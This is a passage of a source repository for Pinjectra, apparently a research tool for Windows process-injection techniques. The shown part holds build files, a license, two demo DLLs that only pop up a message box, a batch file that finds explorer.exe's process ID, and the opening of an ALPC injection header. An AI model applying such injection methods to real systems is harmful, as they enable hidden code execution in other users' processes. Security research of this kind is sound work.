├── .gitignore
├── LICENSE
├── MsgBoxOnGetMsgProc
├── MsgBoxOnGetMsgProc.vcxproj
├── MsgBoxOnGetMsgProc.vcxproj.filters
└── dllmain_getmsgproc.cpp
├── MsgBoxOnProcessAttach
├── MsgBoxOnProcessAttach.vcxproj
├── MsgBoxOnProcessAttach.vcxproj.filters
└── dllmain_msgbox.cpp
├── PIDOF_EXPLORER.bat
├── Pinjector
├── ALPC.cpp
├── ALPC.h
├── Adapters.cpp
├── CFMA_MVOF_NUVOS_NMVOS.cpp
├── CFMA_MVOF_NUVOS_NMVOS.h
├── CFMA_MVOF_OP_PNMVOS.cpp
├── CFMA_MVOF_OP_PNMVOS.h
├── CreateRemoteThread.cpp
├── CreateRemoteThread.h
├── CtrlInject.cpp
├── CtrlInject.h
├── DynamicPayloads.cpp
├── DynamicPayloads.h
├── ExecutionTechnique.h
├── GhostWriting.cpp
├── GhostWriting.h
├── HookProcProvider.h
├── LLA_GPA.cpp
├── LLA_GPA.h
├── NQAT_WITH_MEMSET.cpp
├── NQAT_WITH_MEMSET.h
├── OP_VAE_WPM.cpp
├── OP_VAE_WPM.h
├── OT_OP_VAE_GAAA.cpp
├── OT_OP_VAE_GAAA.h
├── PROPagate.cpp
├── PROPagate.h
├── Pinjector.vcxproj
├── Pinjector.vcxproj.filters
├── Pinjectra.rc
├── PinjectraDemo.cpp
├── PinjectraPacket.h
├── QueueUserAPC.cpp
├── QueueUserAPC.h
├── SIR.cpp
├── SIR.h
├── SetWindowLongPtrA.cpp
├── SetWindowLongPtrA.h
├── StaticPayloads.c
├── StaticPayloads.h
├── VAE_WPM.cpp
├── VAE_WPM.h
├── WindowsHook.cpp
├── WindowsHook.h
├── WritingTechniques.h
├── memmem.c
├── memmem.h
├── misc.c
├── misc.h
└── ntapi.h
├── Pinjectra.sln
├── README.md
└── TestProcess
├── TestProcess.c
├── TestProcess.vcxproj
└── TestProcess.vcxproj.filters
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.suo
8 | *.user
9 | *.userosscache
10 | *.sln.docstates
11 |
12 | # User-specific files (MonoDevelop/Xamarin Studio)
13 | *.userprefs
14 |
15 | # Build results
16 | [Dd]ebug/
17 | [Dd]ebugPublic/
18 | [Rr]elease/
19 | [Rr]eleases/
20 | x64/
21 | x86/
22 | bld/
23 | [Bb]in/
24 | [Oo]bj/
25 | [Ll]og/
26 |
27 | # Visual Studio 2015/2017 cache/options directory
28 | .vs/
29 | # Uncomment if you have tasks that create the project's static files in wwwroot
30 | #wwwroot/
31 |
32 | # Visual Studio 2017 auto generated files
33 | Generated\ Files/
34 |
35 | # MSTest test Results
36 | [Tt]est[Rr]esult*/
37 | [Bb]uild[Ll]og.*
38 |
39 | # NUNIT
40 | *.VisualState.xml
41 | TestResult.xml
42 |
43 | # Build Results of an ATL Project
44 | [Dd]ebugPS/
45 | [Rr]eleasePS/
46 | dlldata.c
47 |
48 | # Benchmark Results
49 | BenchmarkDotNet.Artifacts/
50 |
51 | # .NET Core
52 | project.lock.json
53 | project.fragment.lock.json
54 | artifacts/
55 | **/Properties/launchSettings.json
56 |
57 | # StyleCop
58 | StyleCopReport.xml
59 |
60 | # Files built by Visual Studio
61 | *_i.c
62 | *_p.c
63 | *_i.h
64 | *.ilk
65 | *.meta
66 | *.obj
67 | *.iobj
68 | *.pch
69 | *.pdb
70 | *.ipdb
71 | *.pgc
72 | *.pgd
73 | *.rsp
74 | *.sbr
75 | *.tlb
76 | *.tli
77 | *.tlh
78 | *.tmp
79 | *.tmp_proj
80 | *.log
81 | *.vspscc
82 | *.vssscc
83 | .builds
84 | *.pidb
85 | *.svclog
86 | *.scc
87 |
88 | # Chutzpah Test files
89 | _Chutzpah*
90 |
91 | # Visual C++ cache files
92 | ipch/
93 | *.aps
94 | *.ncb
95 | *.opendb
96 | *.opensdf
97 | *.sdf
98 | *.cachefile
99 | *.VC.db
100 | *.VC.VC.opendb
101 |
102 | # Visual Studio profiler
103 | *.psess
104 | *.vsp
105 | *.vspx
106 | *.sap
107 |
108 | # Visual Studio Trace Files
109 | *.e2e
110 |
111 | # TFS 2012 Local Workspace
112 | $tf/
113 |
114 | # Guidance Automation Toolkit
115 | *.gpState
116 |
117 | # ReSharper is a .NET coding add-in
118 | _ReSharper*/
119 | *.[Rr]e[Ss]harper
120 | *.DotSettings.user
121 |
122 | # JustCode is a .NET coding add-in
123 | .JustCode
124 |
125 | # TeamCity is a build add-in
126 | _TeamCity*
127 |
128 | # DotCover is a Code Coverage Tool
129 | *.dotCover
130 |
131 | # AxoCover is a Code Coverage Tool
132 | .axoCover/*
133 | !.axoCover/settings.json
134 |
135 | # Visual Studio code coverage results
136 | *.coverage
137 | *.coveragexml
138 |
139 | # NCrunch
140 | _NCrunch_*
141 | .*crunch*.local.xml
142 | nCrunchTemp_*
143 |
144 | # MightyMoose
145 | *.mm.*
146 | AutoTest.Net/
147 |
148 | # Web workbench (sass)
149 | .sass-cache/
150 |
151 | # Installshield output folder
152 | [Ee]xpress/
153 |
154 | # DocProject is a documentation generator add-in
155 | DocProject/buildhelp/
156 | DocProject/Help/*.HxT
157 | DocProject/Help/*.HxC
158 | DocProject/Help/*.hhc
159 | DocProject/Help/*.hhk
160 | DocProject/Help/*.hhp
161 | DocProject/Help/Html2
162 | DocProject/Help/html
163 |
164 | # Click-Once directory
165 | publish/
166 |
167 | # Publish Web Output
168 | *.[Pp]ublish.xml
169 | *.azurePubxml
170 | # Note: Comment the next line if you want to checkin your web deploy settings,
171 | # but database connection strings (with potential passwords) will be unencrypted
172 | *.pubxml
173 | *.publishproj
174 |
175 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
176 | # checkin your Azure Web App publish settings, but sensitive information contained
177 | # in these scripts will be unencrypted
178 | PublishScripts/
179 |
180 | # NuGet Packages
181 | *.nupkg
182 | # The packages folder can be ignored because of Package Restore
183 | **/[Pp]ackages/*
184 | # except build/, which is used as an MSBuild target.
185 | !**/[Pp]ackages/build/
186 | # Uncomment if necessary however generally it will be regenerated when needed
187 | #!**/[Pp]ackages/repositories.config
188 | # NuGet v3's project.json files produces more ignorable files
189 | *.nuget.props
190 | *.nuget.targets
191 |
192 | # Microsoft Azure Build Output
193 | csx/
194 | *.build.csdef
195 |
196 | # Microsoft Azure Emulator
197 | ecf/
198 | rcf/
199 |
200 | # Windows Store app package directories and files
201 | AppPackages/
202 | BundleArtifacts/
203 | Package.StoreAssociation.xml
204 | _pkginfo.txt
205 | *.appx
206 |
207 | # Visual Studio cache files
208 | # files ending in .cache can be ignored
209 | *.[Cc]ache
210 | # but keep track of directories ending in .cache
211 | !*.[Cc]ache/
212 |
213 | # Others
214 | ClientBin/
215 | ~$*
216 | *~
217 | *.dbmdl
218 | *.dbproj.schemaview
219 | *.jfm
220 | *.pfx
221 | *.publishsettings
222 | orleans.codegen.cs
223 |
224 | # Including strong name files can present a security risk
225 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
226 | #*.snk
227 |
228 | # Since there are multiple workflows, uncomment next line to ignore bower_components
229 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
230 | #bower_components/
231 |
232 | # RIA/Silverlight projects
233 | Generated_Code/
234 |
235 | # Backup & report files from converting an old project file
236 | # to a newer Visual Studio version. Backup files are not needed,
237 | # because we have git ;-)
238 | _UpgradeReport_Files/
239 | Backup*/
240 | UpgradeLog*.XML
241 | UpgradeLog*.htm
242 | ServiceFabricBackup/
243 | *.rptproj.bak
244 |
245 | # SQL Server files
246 | *.mdf
247 | *.ldf
248 | *.ndf
249 |
250 | # Business Intelligence projects
251 | *.rdl.data
252 | *.bim.layout
253 | *.bim_*.settings
254 | *.rptproj.rsuser
255 |
256 | # Microsoft Fakes
257 | FakesAssemblies/
258 |
259 | # GhostDoc plugin setting file
260 | *.GhostDoc.xml
261 |
262 | # Node.js Tools for Visual Studio
263 | .ntvs_analysis.dat
264 | node_modules/
265 |
266 | # Visual Studio 6 build log
267 | *.plg
268 |
269 | # Visual Studio 6 workspace options file
270 | *.opt
271 |
272 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
273 | *.vbw
274 |
275 | # Visual Studio LightSwitch build output
276 | **/*.HTMLClient/GeneratedArtifacts
277 | **/*.DesktopClient/GeneratedArtifacts
278 | **/*.DesktopClient/ModelManifest.xml
279 | **/*.Server/GeneratedArtifacts
280 | **/*.Server/ModelManifest.xml
281 | _Pvt_Extensions
282 |
283 | # Paket dependency manager
284 | .paket/paket.exe
285 | paket-files/
286 |
287 | # FAKE - F# Make
288 | .fake/
289 |
290 | # JetBrains Rider
291 | .idea/
292 | *.sln.iml
293 |
294 | # CodeRush
295 | .cr/
296 |
297 | # Python Tools for Visual Studio (PTVS)
298 | __pycache__/
299 | *.pyc
300 |
301 | # Cake - Uncomment if you are using it
302 | # tools/**
303 | # !tools/packages.config
304 |
305 | # Tabs Studio
306 | *.tss
307 |
308 | # Telerik's JustMock configuration file
309 | *.jmconfig
310 |
311 | # BizTalk build output
312 | *.btp.cs
313 | *.btm.cs
314 | *.odx.cs
315 | *.xsd.cs
316 |
317 | # OpenCover UI analysis results
318 | OpenCover/
319 |
320 | # Azure Stream Analytics local run output
321 | ASALocalRun/
322 |
323 | # MSBuild Binary and Structured Log
324 | *.binlog
325 |
326 | # NVidia Nsight GPU debugger configuration file
327 | *.nvuser
328 |
329 | # MFractors (Xamarin productivity tool) working folder
330 | .mfractor/
331 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | BSD 3-Clause License
2 |
3 | Copyright (c) 2019, SafeBreach Labs
4 | All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without
7 | modification, are permitted provided that the following conditions are met:
8 |
9 | * Redistributions of source code must retain the above copyright notice, this
10 | list of conditions and the following disclaimer.
11 |
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 | this list of conditions and the following disclaimer in the documentation
14 | and/or other materials provided with the distribution.
15 |
16 | * Neither the name of the copyright holder nor the names of its
17 | contributors may be used to endorse or promote products derived from
18 | this software without specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 |
--------------------------------------------------------------------------------
/MsgBoxOnGetMsgProc/MsgBoxOnGetMsgProc.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {03EFD090-F799-4071-B684-A3086CF2FA70}
24 | Win32Proj
25 | MsgBoxOnGetMsgProc
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | false
75 |
76 |
77 | true
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | NotUsing
88 | Level3
89 | MaxSpeed
90 | true
91 | true
92 | true
93 | NDEBUG;MSGBOXONGETMSGPROC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
94 | true
95 | pch.h
96 |
97 |
98 | Windows
99 | true
100 | true
101 | true
102 | false
103 |
104 |
105 |
106 |
107 | Use
108 | Level3
109 | Disabled
110 | true
111 | WIN32;_DEBUG;MSGBOXONGETMSGPROC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
112 | true
113 | pch.h
114 |
115 |
116 | Windows
117 | true
118 | false
119 |
120 |
121 |
122 |
123 | NotUsing
124 | Level3
125 | Disabled
126 | true
127 | _DEBUG;MSGBOXONGETMSGPROC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
128 | true
129 | pch.h
130 |
131 |
132 | Windows
133 | true
134 | false
135 |
136 |
137 |
138 |
139 | Use
140 | Level3
141 | MaxSpeed
142 | true
143 | true
144 | true
145 | WIN32;NDEBUG;MSGBOXONGETMSGPROC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
146 | true
147 | pch.h
148 |
149 |
150 | Windows
151 | true
152 | true
153 | true
154 | false
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
--------------------------------------------------------------------------------
/MsgBoxOnGetMsgProc/MsgBoxOnGetMsgProc.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/MsgBoxOnGetMsgProc/dllmain_getmsgproc.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
34 | // Windows Header Files
35 | #include
36 |
37 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
38 | switch (fdwReason) {
39 | case DLL_PROCESS_ATTACH:
40 | /* Init Code here */
41 | break;
42 |
43 | case DLL_THREAD_ATTACH:
44 | /* Thread-specific init code here */
45 | break;
46 |
47 | case DLL_THREAD_DETACH:
48 | /* Thread-specific cleanup code here.
49 | */
50 | break;
51 |
52 | case DLL_PROCESS_DETACH:
53 | /* Cleanup code here */
54 | break;
55 | }
56 | /* The return value is used for successful DLL_PROCESS_ATTACH */
57 | return TRUE;
58 | }
59 |
60 | extern "C" __declspec(dllexport) LRESULT CALLBACK GetMsgProc(_In_ int code, _In_ WPARAM wParam, _In_ LPARAM lParam) {
61 | MessageBoxA(NULL, "Hello from GetMsgProc", "Hook DLL", MB_OK);
62 | return CallNextHookEx(NULL, code, wParam, lParam);
63 | }
64 |
--------------------------------------------------------------------------------
/MsgBoxOnProcessAttach/MsgBoxOnProcessAttach.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {259CE055-7726-4963-AFC5-42C8847BF53D}
24 | Win32Proj
25 | MsgBoxOnProcessAttach
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | false
75 |
76 |
77 | true
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | NotUsing
88 | Level3
89 | MaxSpeed
90 | true
91 | true
92 | true
93 | NDEBUG;MSGBOXONPROCESSATTACH_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
94 | true
95 | pch.h
96 |
97 |
98 | Windows
99 | true
100 | true
101 | true
102 | false
103 |
104 |
105 |
106 |
107 | Use
108 | Level3
109 | Disabled
110 | true
111 | WIN32;_DEBUG;MSGBOXONPROCESSATTACH_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
112 | true
113 | pch.h
114 |
115 |
116 | Windows
117 | true
118 | false
119 |
120 |
121 |
122 |
123 | NotUsing
124 | Level3
125 | Disabled
126 | true
127 | _DEBUG;MSGBOXONPROCESSATTACH_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
128 | true
129 | pch.h
130 |
131 |
132 | Windows
133 | true
134 | false
135 |
136 |
137 |
138 |
139 | Use
140 | Level3
141 | MaxSpeed
142 | true
143 | true
144 | true
145 | WIN32;NDEBUG;MSGBOXONPROCESSATTACH_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
146 | true
147 | pch.h
148 |
149 |
150 | Windows
151 | true
152 | true
153 | true
154 | false
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
--------------------------------------------------------------------------------
/MsgBoxOnProcessAttach/MsgBoxOnProcessAttach.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/MsgBoxOnProcessAttach/dllmain_msgbox.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include
32 |
33 | BOOL APIENTRY DllMain( HMODULE hModule,
34 | DWORD ul_reason_for_call,
35 | LPVOID lpReserved
36 | )
37 | {
38 | switch (ul_reason_for_call)
39 | {
40 | case DLL_PROCESS_ATTACH:
41 | MessageBoxA(NULL, "SimpleDLL loaded successfully!", "SimpleDll MessageBox", MB_OK);
42 | break;
43 | case DLL_THREAD_ATTACH:
44 | case DLL_THREAD_DETACH:
45 | case DLL_PROCESS_DETACH:
46 | break;
47 | }
48 | return TRUE;
49 | }
50 |
--------------------------------------------------------------------------------
/PIDOF_EXPLORER.bat:
--------------------------------------------------------------------------------
1 | @rem Copyright (c) 2019, SafeBreach
2 | @rem All rights reserved.
3 | @rem
4 | @rem Redistribution and use in source and binary forms, with or without
5 | @rem modification, are permitted provided that the following conditions are met:
6 | @rem
7 | @rem * Redistributions of source code must retain the above copyright notice,
8 | @rem this list of conditions and the following disclaimer.
9 | @rem * Redistributions in binary form must reproduce the above copyright
10 | @rem notice, this list of conditions and the following disclaimer in the
11 | @rem documentation and/or other materials provided with the distribution.
12 | @rem * Neither the name of the copyright holder nor the names of its
13 | @rem contributors may be used to endorse or promote products derived from
14 | @rem this software without specific prior written permission.
15 | @rem
16 | @rem THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | @rem AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | @rem IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | @rem ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | @rem LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | @rem CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | @rem SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | @rem INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | @rem CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | @rem ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | @rem POSSIBILITY OF SUCH DAMAGE.
27 |
28 | @echo off
29 | tasklist /v /fo csv | findstr /i "explorer.exe"
30 |
--------------------------------------------------------------------------------
/Pinjector/ALPC.h:
--------------------------------------------------------------------------------
1 | // BASED ON
2 | // https://github.com/odzhan/injection/tree/master/spooler
3 | // https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler/
4 |
5 | // Copyright (c) 2019, SafeBreach
6 | // All rights reserved.
7 | //
8 | // Redistribution and use in source and binary forms, with or without
9 | // modification, are permitted provided that the following conditions are met:
10 | //
11 | // * Redistributions of source code must retain the above copyright notice,
12 | // this list of conditions and the following disclaimer.
13 | // * Redistributions in binary form must reproduce the above copyright
14 | // notice, this list of conditions and the following disclaimer in the
15 | // documentation and/or other materials provided with the distribution.
16 | // * Neither the name of the copyright holder nor the names of its
17 | // contributors may be used to endorse or promote products derived from
18 | // this software without specific prior written permission.
19 | //
20 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
23 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
24 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
25 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
26 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
27 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
28 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
29 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
30 | // POSSIBILITY OF SUCH DAMAGE.
31 |
32 | // AUTHORS: Amit Klein, Itzik Kotler
33 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
34 |
35 | #pragma once
36 |
37 | // Standard Include's
38 | #include
39 | #include
40 |
41 | // Local Include's
42 | #include "ExecutionTechnique.h"
43 | #include "WritingTechniques.h"
44 |
45 | // Macros
46 | #define NT_SUCCESS(x) ((x)>=0)
47 |
48 | #define NTFUNC(f,fname,def) typedef NTSTATUS (* t##f) def;\
49 | t##f f=(t##f)GetProcAddress(GetModuleHandleA("ntdll"),fname)
50 |
51 | // Datatypes
52 | typedef enum _SYSTEM_INFORMATION_CLASS
53 | {
54 | SystemBasicInformation = 0,
55 | SystemProcessorInformation = 1, // obsolete...delete
56 | SystemPerformanceInformation = 2,
57 | SystemTimeOfDayInformation = 3,
58 | SystemPathInformation = 4,
59 | SystemProcessInformation = 5,
60 | SystemCallCountInformation = 6,
61 | SystemDeviceInformation = 7,
62 | SystemProcessorPerformanceInformation = 8,
63 | SystemFlagsInformation = 9,
64 | SystemCallTimeInformation = 10,
65 | SystemModuleInformation = 11,
66 | SystemLocksInformation = 12,
67 | SystemStackTraceInformation = 13,
68 | SystemPagedPoolInformation = 14,
69 | SystemNonPagedPoolInformation = 15,
70 | SystemHandleInformation = 16,
71 | SystemObjectInformation = 17,
72 | SystemPageFileInformation = 18,
73 | SystemVdmInstemulInformation = 19,
74 | SystemVdmBopInformation = 20,
75 | SystemFileCacheInformation = 21,
76 | SystemPoolTagInformation = 22,
77 | SystemInterruptInformation = 23,
78 | SystemDpcBehaviorInformation = 24,
79 | SystemFullMemoryInformation = 25,
80 | SystemLoadGdiDriverInformation = 26,
81 | SystemUnloadGdiDriverInformation = 27,
82 | SystemTimeAdjustmentInformation = 28,
83 | SystemSummaryMemoryInformation = 29,
84 | SystemMirrorMemoryInformation = 30,
85 | SystemPerformanceTraceInformation = 31,
86 | SystemObsolete0 = 32,
87 | SystemExceptionInformation = 33,
88 | SystemCrashDumpStateInformation = 34,
89 | SystemKernelDebuggerInformation = 35,
90 | SystemContextSwitchInformation = 36,
91 | SystemRegistryQuotaInformation = 37,
92 | SystemExtendServiceTableInformation = 38,
93 | SystemPrioritySeperation = 39,
94 | SystemVerifierAddDriverInformation = 40,
95 | SystemVerifierRemoveDriverInformation = 41,
96 | SystemProcessorIdleInformation = 42,
97 | SystemLegacyDriverInformation = 43,
98 | SystemCurrentTimeZoneInformation = 44,
99 | SystemLookasideInformation = 45,
100 | SystemTimeSlipNotification = 46,
101 | SystemSessionCreate = 47,
102 | SystemSessionDetach = 48,
103 | SystemSessionInformation = 49,
